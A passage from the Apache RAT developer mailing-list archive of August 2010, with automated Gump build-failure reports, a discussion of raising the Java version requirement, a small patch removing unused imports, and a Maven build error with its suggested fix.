Aug 05 06:45:22 PDT 2010 [INFO] Final Memory: 31M/74M [INFO] ------------------------------------------------------------------------ --------------------------------------------- To subscribe to this information via syndicated feeds: - RSS: http://vmgump.apache.org/gump/public/rat/rat/rss.xml - Atom: http://vmgump.apache.org/gump/public/rat/rat/atom.xml ============================== Gump Tracking Only === Produced by Gump version 2.3. Gump Run 12000005082010, vmgump:vmgump-public:12000005082010 Gump E-mail Identifier (unique within run) #47. -- Apache Gump http://gump.apache.org/ [Instance: vmgump] From [email protected] Thu Aug 05 14:17:06 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 84907 invoked from network); 5 Aug 2010 14:17:06 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 5 Aug 2010 14:17:06 -0000 Received: (qmail 14038 invoked by uid 500); 5 Aug 2010 14:17:06 -0000 Delivered-To: [email protected] Received: (qmail 13990 invoked by uid 500); 5 Aug 2010 14:17:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 13970 invoked by uid 99); 5 Aug 2010 14:17:04 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 14:17:04 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO samaflost.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 14:16:57 +0000 Received: from localhost (localhost.localdomain [161.129.204.104]) by samaflost.de (Postfix) with ESMTP id D505428985D1 for <[email protected]>; Thu, 5 Aug 2010 16:16:31 +0200 (CEST) Received: from samaflost.de ([161.129.204.104]) by localhost (v35516.1blu.de [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id CPToTCSpZYLa for <[email protected]>; Thu, 5 Aug 2010 16:16:30 +0200 (CEST) Received: by samaflost.de (Postfix, from userid 1000) id B828628985D2; Thu, 5 Aug 2010 16:16:30 +0200 (CEST) From: Stefan Bodewig <[email protected]> To: [email protected] Subject: Re: [PATCH] References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Draft-From: ("nnfolder:mail.rat" 1017) Date: Thu, 05 Aug 2010 16:16:27 +0200 In-Reply-To: <[email protected]> (Hyrum K. Wright's message of "Wed, 4 Aug 2010 16:34:24 -0500") Message-ID: <[email protected]> User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/23.2 (gnu/linux) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii On 2010-08-04, Hyrum K. Wright wrote: > Well, we can at least change the source and target Java versions, > which removes the 1.4 restriction, and then just change stuff as it > comes along. This is true. > (This coming from the guy is is also subverting RAT by writing a > competitor. :) Sorry I haven't found time to look into Mouse, yet. And it looks as if Gump and a Commons Compress release will be eating up my OSS time for the next week or so. Stefan From [email protected] Thu Aug 05 14:18:56 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 85882 invoked from network); 5 Aug 2010 14:18:55 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 5 Aug 2010 14:18:55 -0000 Received: (qmail 16143 invoked by uid 500); 5 Aug 2010 14:18:55 -0000 Delivered-To: [email protected] Received: (qmail 16085 invoked by uid 500); 5 Aug 2010 14:18:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 16077 invoked by uid 99); 5 Aug 2010 14:18:54 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 14:18:54 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO samaflost.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 14:18:46 +0000 Received: from localhost (localhost.localdomain [161.129.204.104]) by samaflost.de (Postfix) with ESMTP id A12D028985D1 for <[email protected]>; Thu, 5 Aug 2010 16:18:26 +0200 (CEST) Received: from samaflost.de ([161.129.204.104]) by localhost (v35516.1blu.de [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id wEKi0XOVmqhT for <[email protected]>; Thu, 5 Aug 2010 16:18:25 +0200 (CEST) Received: by samaflost.de (Postfix, from userid 1000) id 5CF9328985D2; Thu, 5 Aug 2010 16:18:24 +0200 (CEST) From: Stefan Bodewig <[email protected]> To: [email protected] Subject: Re: [PATCH] References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Draft-From: ("nnfolder:mail.rat" 1018) Date: Thu, 05 Aug 2010 16:18:20 +0200 In-Reply-To: <[email protected]> (Jochen Wiedmann's message of "Thu, 5 Aug 2010 08:02:48 +0200") Message-ID: <[email protected]> User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/23.2 (gnu/linux) MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org On 2010-08-05, Jochen Wiedmann wrote: > On Wed, Aug 4, 2010 at 10:40 PM, Stefan Bodewig <[email protected]> wrot= e: >> Even though Ant still lives in Java 1.4 land, there wouldn't be any >> problem with an Antlib that required Java 5 - Maven 2.2 requires Java5 >> by now. =C2=A0I don't really think we are sticking with Java 1.4 for any= real >> reason other than "nobody has started the migration". > RAT is an important tool for Ant based builds. Sure, but if the Antlib requires Java5 that doesn't mean you have to do the rest of the build with it. > As Maven now depends on Java 1.5, I'd prefer to wait for Ant. Ant 1.8.0 released early this year was the first release to require Java 1.4 - I don't expect Ant to move to Java5 before mid-2011. Stefan From [email protected] Thu Aug 05 14:28:46 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91451 invoked from network); 5 Aug 2010 14:28:46 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 5 Aug 2010 14:28:46 -0000 Received: (qmail 33620 invoked by uid 500); 5 Aug 2010 14:28:46 -0000 Delivered-To: [email protected] Received: (qmail 33572 invoked by uid 500); 5 Aug 2010 14:28:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 33564 invoked by uid 99); 5 Aug 2010 14:28:44 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 14:28:44 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO mail-qw0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 14:28:35 +0000 Received: by qwg8 with SMTP id 8so4140375qwg.6 for <[email protected]>; Thu, 05 Aug 2010 07:28:11 -0700 (PDT) MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id o15mr5020231qak.365.1281018490057; Thu, 05 Aug 2010 07:28:10 -0700 (PDT) Sender: [email protected] Received: by 161.129.204.104 with HTTP; Thu, 5 Aug 2010 07:28:09 -0700 (PDT) X-Originating-IP: [161.129.204.104] In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Thu, 5 Aug 2010 09:28:09 -0500 X-Google-Sender-Auth: QvgyiwEWHRjIBKLkvC6b8dcT7B8 Message-ID: <[email protected]> Subject: Re: [PATCH] From: "Hyrum K. Wright" <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 X-Virus-Checked: Checked by ClamAV on apache.org On Thu, Aug 5, 2010 at 9:16 AM, Stefan Bodewig <[email protected]> wrote: > On 2010-08-04, Hyrum K. Wright wrote: >> >> (This coming from the guy is is also subverting RAT by writing a >> competitor. :) > > Sorry I haven't found time to look into Mouse, yet. And it looks as if > Gump and a Commons Compress release will be eating up my OSS time for > the next week or so. No worries, I'm only gradually fleshing out functionality. I'll post to this list when Mouse is "done" (but folks are of course willing to play around with it before then: it's currently being housed in Apache Labs). -Hyrum From [email protected] Thu Aug 05 14:58:38 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 2525 invoked from network); 5 Aug 2010 14:58:38 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 5 Aug 2010 14:58:38 -0000 Received: (qmail 82525 invoked by uid 500); 5 Aug 2010 14:58:38 -0000 Delivered-To: [email protected] Received: (qmail 82470 invoked by uid 500); 5 Aug 2010 14:58:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 82460 invoked by uid 99); 5 Aug 2010 14:58:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 14:58:37 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mail-qw0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 14:58:29 +0000 Received: by qwg8 with SMTP id 8so4170099qwg.6 for <[email protected]>; Thu, 05 Aug 2010 07:58:08 -0700 (PDT) MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id jh19mr3676937qcb.76.1281020288381; Thu, 05 Aug 2010 07:58:08 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Thu, 5 Aug 2010 07:58:08 -0700 (PDT) X-Originating-IP: [161.129.204.104] Date: Thu, 5 Aug 2010 09:58:08 -0500 Message-ID: <[email protected]> Subject: [PATCH] Remove unneeded imports From: Hyrum Wright <[email protected]> To: rat-dev <[email protected]> Content-Type: multipart/mixed; boundary=00163630fa2b3d3556048d14c715 --00163630fa2b3d3556048d14c715 Content-Type: text/plain; charset=ISO-8859-1 Another quite trivial patch to remove a couple of unneeded import noise from RAT. -Hyrum --00163630fa2b3d3556048d14c715 Content-Type: text/plain; charset=US-ASCII; name="remove-imports.patch.txt" Content-Disposition: attachment; filename="remove-imports.patch.txt" Content-Transfer-Encoding: base64 X-Attachment-Id: f_gchqdtk40 SW5kZXg6IGFwYWNoZS1yYXQtY29yZS9zcmMvdGVzdC9qYXZhL29yZy9hcGFjaGUvcmF0L2FuYWx5 c2lzL0hlYWRlckNoZWNrV29ya2VyVGVzdC5qYXZhCj09PT09PT09PT09PT09PT09PT09PT09PT09 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0KLS0tIGFwYWNoZS1yYXQt Y29yZS9zcmMvdGVzdC9qYXZhL29yZy9hcGFjaGUvcmF0L2FuYWx5c2lzL0hlYWRlckNoZWNrV29y a2VyVGVzdC5qYXZhCShyZXZpc2lvbiA5ODI2NDUpCisrKyBhcGFjaGUtcmF0LWNvcmUvc3JjL3Rl c3QvamF2YS9vcmcvYXBhY2hlL3JhdC9hbmFseXNpcy9IZWFkZXJDaGVja1dvcmtlclRlc3QuamF2 YQkod29ya2luZyBjb3B5KQpAQCAtMjcsNyArMjcsNiBAQCBpbXBvcnQgb3JnLmFwYWNoZS5yYXQu YW5hbHlzaXMuSGVhZGVyQ2hlY2tXb3JrZXI7CiBpbXBvcnQgb3JnLmFwYWNoZS5yYXQuYW5hbHlz aXMubGljZW5zZS5BcGFjaGVTb2Z0d2FyZUxpY2Vuc2UyMDsKIGltcG9ydCBvcmcuYXBhY2hlLnJh dC5hcGkuRG9jdW1lbnQ7CiBpbXBvcnQgb3JnLmFwYWNoZS5yYXQuZG9jdW1lbnQuTW9ja0xvY2F0 aW9uOwotaW1wb3J0IG9yZy5hcGFjaGUucmF0LnJlcG9ydC5jbGFpbS5pbXBsLnhtbC5Nb2NrQ2xh aW1SZXBvcnRlcjsKIAogcHVibGljIGNsYXNzIEhlYWRlckNoZWNrV29ya2VyVGVzdCBleHRlbmRz IFRlc3RDYXNlIHsKICAgICAKSW5kZXg6IGFwYWNoZS1yYXQtY29yZS9zcmMvbWFpbi9qYXZhL29y Zy9hcGFjaGUvcmF0L3JlcG9ydC9jbGFpbS9pbXBsL0NsYWltQWdncmVnYXRvci5qYXZhCj09PT09 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09 PT09PT0KLS0tIGFwYWNoZS1yYXQtY29yZS9zcmMvbWFpbi9qYXZhL29yZy9hcGFjaGUvcmF0L3Jl cG9ydC9jbGFpbS9pbXBsL0NsYWltQWdncmVnYXRvci5qYXZhCShyZXZpc2lvbiA5ODI2NDUpCisr KyBhcGFjaGUtcmF0LWNvcmUvc3JjL21haW4vamF2YS9vcmcvYXBhY2hlL3JhdC9yZXBvcnQvY2xh aW0vaW1wbC9DbGFpbUFnZ3JlZ2F0b3IuamF2YQkod29ya2luZyBjb3B5KQpAQCAtMjIsNyArMjIs NiBAQCBwYWNrYWdlIG9yZy5hcGFjaGUucmF0LnJlcG9ydC5jbGFpbS5pbXBsOwogaW1wb3J0IGph dmEudXRpbC5IYXNoTWFwOwogaW1wb3J0IGphdmEudXRpbC5NYXA7CiAKLWltcG9ydCBvcmcuYXBh Y2hlLnJhdC5hcGkuRG9jdW1lbnQ7CiBpbXBvcnQgb3JnLmFwYWNoZS5yYXQuYXBpLlJhdEV4Y2Vw dGlvbjsKIGltcG9ydCBvcmcuYXBhY2hlLnJhdC5hcGkuTWV0YURhdGE7CiBpbXBvcnQgb3JnLmFw YWNoZS5yYXQucmVwb3J0LmNsYWltLkNsYWltU3RhdGlzdGljOwo= --00163630fa2b3d3556048d14c715-- From [email protected] Thu Aug 05 17:53:28 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 86653 invoked from network); 5 Aug 2010 17:53:28 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 5 Aug 2010 17:53:28 -0000 Received: (qmail 21733 invoked by uid 500); 5 Aug 2010 17:53:28 -0000 Delivered-To: [email protected] Received: (qmail 21672 invoked by uid 500); 5 Aug 2010 17:53:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 21662 invoked by uid 99); 5 Aug 2010 17:53:28 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 17:53:27 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mail-qw0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 17:53:20 +0000 Received: by qwg8 with SMTP id 8so4350567qwg.6 for <[email protected]>; Thu, 05 Aug 2010 10:52:59 -0700 (PDT) MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id q27mr3720262qcq.245.1281030779199; Thu, 05 Aug 2010 10:52:59 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Thu, 5 Aug 2010 10:52:59 -0700 (PDT) X-Originating-IP: [161.129.204.104] Date: Thu, 5 Aug 2010 12:52:59 -0500 Message-ID: <[email protected]> Subject: Build error in r982385 From: Hyrum Wright <[email protected]> To: rat-dev <[email protected]> Content-Type: text/plain; charset=ISO-8859-1 Attempting to build the latest RAT from Subversion (with Maven 2.2.0) gives: [[[ dhcp-198-82:rat-trunk Hyrum$ mvn compile ... [INFO] ------------------------------------------------------------------------ [INFO] Building RAT Application [INFO] task-segment: [compile] [INFO] ------------------------------------------------------------------------ [INFO] [remote-resources:process {execution: default}] [INFO] [resources:resources {execution: default-resources}] [INFO] Using 'UTF-8' encoding to copy filtered resources. [INFO] skip non existing resourceDirectory /Users/Hyrum/dev/rat-trunk/apache-rat/src/main/resources [INFO] Copying 3 resources to META-INF [INFO] Copying 3 resources [INFO] [compiler:compile {execution: default-compile}] [INFO] No sources to compile ... [INFO] Unpacking /Users/Hyrum/dev/rat-trunk/apache-rat-core/target/classesto /Users/Hyrum/dev/rat-trunk/apache-rat/target/classes with Includes null and excludes:META-INF/LICENSE,META-INF/NOTICE,META-INF/LICENSE.*,META-INF/NOTICE.* org.codehaus.plexus.archiver.ArchiverException: The source must not be a directory. at org.codehaus.plexus.archiver.AbstractUnArchiver.validate(AbstractUnArchiver.java:174) at org.codehaus.plexus.archiver.AbstractUnArchiver.extract(AbstractUnArchiver.java:107) at org.apache.maven.plugin.dependency.AbstractDependencyMojo.unpack(AbstractDependencyMojo.java:266) at org.apache.maven.plugin.dependency.UnpackDependenciesMojo.execute(UnpackDependenciesMojo.java:90) at org.apache.maven.plugin.DefaultPluginManager.executeMojo(DefaultPluginManager.java:483) at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeGoals(DefaultLifecycleExecutor.java:678) at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeGoalWithLifecycle(DefaultLifecycleExecutor.java:540) at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeGoal(DefaultLifecycleExecutor.java:519) at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeGoalAndHandleFailures(DefaultLifecycleExecutor.java:371) at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeTaskSegments(DefaultLifecycleExecutor.java:332) at org.apache.maven.lifecycle.DefaultLifecycleExecutor.execute(DefaultLifecycleExecutor.java:181) at org.apache.maven.DefaultMaven.doExecute(DefaultMaven.java:356) at org.apache.maven.DefaultMaven.execute(DefaultMaven.java:137) at org.apache.maven.cli.MavenCli.main(MavenCli.java:362) at org.apache.maven.cli.compat.CompatibleMain.main(CompatibleMain.java:41) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) at java.lang.reflect.Method.invoke(Method.java:597) at org.codehaus.classworlds.Launcher.launchEnhanced(Launcher.java:315) at org.codehaus.classworlds.Launcher.launch(Launcher.java:255) at org.codehaus.classworlds.Launcher.mainWithExitCode(Launcher.java:430) at org.codehaus.classworlds.Launcher.main(Launcher.java:375) [INFO] ------------------------------------------------------------------------ [ERROR] BUILD ERROR [INFO] ------------------------------------------------------------------------ [INFO] Error unpacking file: /Users/Hyrum/dev/rat-trunk/apache-rat-core/target/classes to: /Users/Hyrum/dev/rat-trunk/apache-rat/target/classes org.codehaus.plexus.archiver.ArchiverException: The source must not be a directory. [INFO] ------------------------------------------------------------------------ [INFO] For more information, run Maven with the -e switch [INFO] ------------------------------------------------------------------------ [INFO] Total time: 11 seconds [INFO] Finished at: Thu Aug 05 12:49:08 CDT 2010 [INFO] Final Memory: 47M/123M [INFO] ------------------------------------------------------------------------ dhcp-198-82:rat-trunk Hyrum$ ]]] I'm not certain what is going on here, but it appears that Maven is attempting to unpack something which ought not to be unpacked. -Hyrum From [email protected] Thu Aug 05 18:57:42 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30761 invoked from network); 5 Aug 2010 18:57:42 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 5 Aug 2010 18:57:42 -0000 Received: (qmail 16890 invoked by uid 500); 5 Aug 2010 18:57:42 -0000 Delivered-To: [email protected] Received: (qmail 16835 invoked by uid 500); 5 Aug 2010 18:57:41 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 16826 invoked by uid 99); 5 Aug 2010 18:57:41 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 18:57:41 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO samaflost.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 18:57:34 +0000 Received: from localhost (localhost.localdomain [161.129.204.104]) by samaflost.de (Postfix) with ESMTP id 095D528985D1 for <[email protected]>; Thu, 5 Aug 2010 20:57:14 +0200 (CEST) Received: from samaflost.de ([161.129.204.104]) by localhost (v35516.1blu.de [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id murTwXmkPmFr for <[email protected]>; Thu, 5 Aug 2010 20:57:12 +0200 (CEST) Received: by samaflost.de (Postfix, from userid 1000) id A44E028985D2; Thu, 5 Aug 2010 20:57:12 +0200 (CEST) From: Stefan Bodewig <[email protected]> To: [email protected] Subject: Re: Build error in r982385 References: <[email protected]> X-Draft-From: ("nnfolder:mail.rat" 1030) Date: Thu, 05 Aug 2010 20:57:12 +0200 In-Reply-To: <[email protected]> (Hyrum Wright's message of "Thu, 5 Aug 2010 12:52:59 -0500") Message-ID: <[email protected]> User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/23.2 (gnu/linux) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked by ClamAV on apache.org On 2010-08-05, Hyrum Wright wrote: > Attempting to build the latest RAT from Subversion (with Maven 2.2.0) Try Maven 2.2.1 (works for me). Unfortunately the build seems to be sensitive on the version you use. Stefan From [email protected] Sat Aug 07 13:28:43 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 34532 invoked from network); 7 Aug 2010 13:28:43 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 7 Aug 2010 13:28:43 -0000 Received: (qmail 64648 invoked by uid 500); 7 Aug 2010 13:28:43 -0000 Delivered-To: [email protected] Received: (qmail 64599 invoked by uid 500); 7 Aug 2010 13:28:41 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 64591 invoked by uid 99); 7 Aug 2010 13:28:40 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 07 Aug 2010 13:28:40 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO vmgump.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 07 Aug 2010 13:28:37 +0000 Received: from [161.129.204.104] (localhost [161.129.204.104]) by vmgump.apache.org (Postfix) with ESMTP id 2AE48AB4039 for <[email protected]>; Sat, 7 Aug 2010 06:28:16 -0700 (PDT) Date: Sat, 07 Aug 2010 06:28:16 PDT From: [email protected] To: [email protected] Subject: [GUMP@vmgump]: Project rat (in module rat) failed Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org To whom it may engage... This is an automated request, but not an unsolicited one. For more information please visit http://gump.apache.org/nagged.html, and/or contact the folk at [email protected]. Project rat has an issue affecting its community integration. This issue affects 4 projects, and has been outstanding for 4 runs. The current state of this project is 'Failed', with reason 'Build Failed'. For reference only, the following projects are affected by this: - forrest-rat : Apache Forrest software is a publishing framework that trans... - rat : Release Audit Tool - rat-tasks-antunit-tests : Release Audit Tool - rat-test : Release Audit Tool Full details are available at: http://vmgump.apache.org/gump/public/rat/rat/index.html That said, some information snippets are provided here. The following annotations (debug/informational/warning/error messages) were provided: -INFO- Optional dependency ws-commons-axiom failed with reason build failed -DEBUG- (Gump generated) Maven2 Settings in: /srv/gump/public/workspace/rat/gump_mvn_settings.xml -INFO- Failed with reason build failed -DEBUG- Maven POM in: /srv/gump/public/workspace/rat/pom.xml -INFO- Failed to extract fallback artifacts from Gump Repository The following work was performed: http://vmgump.apache.org/gump/public/rat/rat/gump_work/build_rat_rat.html Work Name: build_rat_rat (Type: Build) Work ended in a state of : Failed Elapsed: 46 secs Command Line: mvn --batch-mode -Dmaven.test.skip.exec=true --settings /srv/gump/public/workspace/rat/gump_mvn_settings.xml package [Working Directory: /srv/gump/public/workspace/rat] --------------------------------------------- [ERROR] /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[215,12] cannot find symbol symbol : class RenderingContext location: class org.apache.rat.mp.RatReportMojo [ERROR] /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[215,43] cannot find symbol symbol : class RenderingContext location: class org.apache.rat.mp.RatReportMojo [ERROR] /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[217,36] cannot access org.apache.maven.doxia.module.xhtml.XhtmlSink class file for org.apache.maven.doxia.module.xhtml.XhtmlSink not found SiteRendererSink sink = new SiteRendererSink( context ); [ERROR] /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[218,12] cannot access org.apache.maven.doxia.logging.LogEnabled class file for org.apache.maven.doxia.logging.LogEnabled not found generate( sink, locale ); [INFO] 5 errors [INFO] ------------------------------------------------------------- [INFO] ------------------------------------------------------------------------ [ERROR] BUILD FAILURE [INFO] ------------------------------------------------------------------------ [INFO] Compilation failure /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[42,60] package org.apache.maven.doxia.module.xhtml.decoration.render does not exist /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[215,12] cannot find symbol symbol : class RenderingContext location: class org.apache.rat.mp.RatReportMojo /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[215,43] cannot find symbol symbol : class RenderingContext location: class org.apache.rat.mp.RatReportMojo /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[217,36] cannot access org.apache.maven.doxia.module.xhtml.XhtmlSink class file for org.apache.maven.doxia.module.xhtml.XhtmlSink not found SiteRendererSink sink = new SiteRendererSink( context ); /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[218,12] cannot access org.apache.maven.doxia.logging.LogEnabled class file for org.apache.maven.doxia.logging.LogEnabled not found generate( sink, locale ); [INFO] ------------------------------------------------------------------------ [INFO] For more information, run Maven with the -e switch [INFO] ------------------------------------------------------------------------ [INFO] Total time: 44 seconds [INFO] Finished at: Sat Aug 07 06:28:14 PDT 2010 [INFO] Final Memory: 31M/74M [INFO] ------------------------------------------------------------------------ --------------------------------------------- To subscribe to this information via syndicated feeds: - RSS: http://vmgump.apache.org/gump/public/rat/rat/rss.xml - Atom: http://vmgump.apache.org/gump/public/rat/rat/atom.xml ============================== Gump Tracking Only === Produced by Gump version 2.3. Gump Run 06000007082010, vmgump:vmgump-public:06000007082010 Gump E-mail Identifier (unique within run) #37. -- Apache Gump http://gump.apache.org/ [Instance: vmgump] From [email protected] Sat Aug 07 21:05:04 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 2780 invoked from network); 7 Aug 2010 21:05:04 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 7 Aug 2010 21:05:04 -0000 Received: (qmail 96917 invoked by uid 500); 7 Aug 2010 21:05:04 -0000 Delivered-To: [email protected] Received: (qmail 96873 invoked by uid 500); 7 Aug 2010 21:05:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 96864 invoked by uid 99); 7 Aug 2010 21:05:03 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 07 Aug 2010 21:05:03 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 